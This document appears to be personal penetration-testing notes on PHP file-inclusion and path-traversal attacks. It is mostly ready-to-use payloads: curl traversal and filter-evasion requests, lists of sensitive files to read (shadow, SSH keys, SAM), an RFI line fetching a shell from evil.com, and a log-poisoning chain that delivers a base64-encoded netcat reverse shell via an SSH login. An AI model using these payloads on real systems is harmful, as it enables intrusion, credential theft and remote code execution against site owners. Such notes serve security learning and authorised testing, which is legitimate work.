LFI - RFI - Path traversal

LFI: Local File Iclusion

- Basic Includes

curl --silent http://localhost/index.php?file=/etc/subgid

- Using Wrappers

PayloadsAllTheThings/File Inclusion at master · swisskyrepo/PayloadsAllTheThingsGitHub

To read a php file:

http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php

curl --silent http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php |base64 -d 2>/dev/null

- Directory Traversal Attack

http://localhost/file.php?file=../../../../../etc/passwd

http://localhost/file.php?file=../../../../../etc/passwd?

Null byte injection:

http://localhost/file.php?file=../../../../../etc/passwd%00

curl --silent "http://localhost/index.php?file=../../../../../../../../../etc/subgid%00"

(Null byte injection was fixed after PHP 5.3.4)

- Filter evasion

curl --silent "http://localhost/index.php?file=..%2F..%2F..%2F..%2F..%2Fetc/subgid"

curl --silent "http://localhost/index.php?file=....//....//....//....//....//etc/subgid"

- Double Encoding

First encoding: %2E%2E%2Fetc%2Fpasswd

Second encoding (codify the %): %252E%252E%252Fetc%252Fpasswd

- Path Truncation

We add hundred times ./ Once the file name is bigger than 4096 bytes, the longest part get deleted so our request is converted to ../../../etc/passwd

../../../../etc/passwd/././././././<...>/.php.

- LFI-Jhaddix wordlist

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

- Interesting files to see in Linux

/etc/issue /etc/motd /etc/passwd /etc/group /etc/resolv.conf /etc/shadow /home/[USERNAME]/.bash_history o .profile ~/.bash_history o .profile $USER/.bash_history o .profile /root/.bash_history o .profile /etc/mtab /etc/inetd.conf /var/log/dmessage .htaccess config.php authorized_keys id_rsa id_rsa.keystore id_rsa.pub known_hosts /etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_ log /usr/local/apache/logs/access. log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/apache/error.log /var/log/apache/access.log /var/log/httpd/error_log /var/log/access_log /var/log/mail /var/log/sshd.log /var/log/vsftpd.log .bash_history .mysql_history .my.cnf /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ

- Interesting files to see in Windows

c:\WINDOWS\system32\eula.txt c:\boot.ini c:\WINDOWS\win.ini c:\WINNT\win.ini c:\WINDOWS\Repair\SAM c:\WINDOWS\php.ini c:\WINNT\php.ini c:\Program Files\Apache Group\Apache\conf\httpd.conf c:\Program Files\Apache Group\Apache2\conf\httpd.conf c:\Program Files\xampp\apache\conf\httpd.conf c:\php\php.ini c:\php5\php.ini c:\php4\php.ini c:\apache\php\php.ini c:\xampp\apache\bin\php.ini c:\home2\bin\stable\apache\php.ini c:\home\bin\stable\apache\php.ini c:\Program Files\Apache Group\Apache\logs\access.log c:\Program Files\Apache Group\Apache\logs\error.log c:\WINDOWS\TEMP\ c:\php\sessions\ c:\php5\sessions\ c:\php4\sessions\ windows\repair\SAM %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system

RFI: Remote File Iclusion

- Basic RFI

Basic example:

vuln.php?page=http://evil.com/shell.txt

Other example in which gwolle plugin is vulnerable to RFI:

http://192.168.1.X/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abs path=http://{My IP}/wp-load.php

- LFI to RFI Using Wrappers

Wrapper php://filter

Wrapper zip://

Wrapper data://

Wrapper expect://

Wrapper input://

Wrapper phar://

LFI to RCE: Local File Inclusion to Remote Code Execution

- Log Poisoning

First we try to access to a log file

Ex: /var/log

/var/log/apache2/access.log

Then:

curl -s -H "User-Agent: <?php system('whoami'); ?> " "http://localhost/example.php?file=/var/log/apache2/access.log"

(curl means client url and it communicates with a web or application server by specifying a relevant URL and the data that need to be sent or received. In this example we add -s (silent, if fails show an error) and -H stands for extra header to include in the request)

Now we have sent a petition to that url with a defined user agent <?php system('whoami'); ?> so the web interpreted the php

In var/log/auth.log here we can see all the users trying to authenticate on the web.

So we can try authenticating with and invalid user.

Here we are trying to define a command as an usser

This will depend on whats the web runing behind, look at pentest monkey to see comands depending on this.

nc -nlvp 443 (first we listen in the port 443)

First try is working with our own machine (nc -e /bin/bash "our ip")

Then we are trying to athenticate in the system with the previous command to send to our machine the shell.

echo "nc -e /bin/bash "our ip"" | base64; echo (Here we codify the previous command in base 64 to have no problems with the system lecture)

echo ""codify command in base 64"" | base64 -d | bash (Here we have the command to decodify the previous command and execute it with bash)

Now we try to inject php code and run this command:

ssh '<?php system("echo "codify command in base 64" | base64 -d | bash"); ?>'@"target" Here we run the command and try getting a reverse shell.

Then we put an invalid password

Now in the window of the terminal we are listening to the port 443 (nc -nlvp 443) if we put whoami we can prove we are in the system and now we can run commands (ex: script/dev/null -c bash)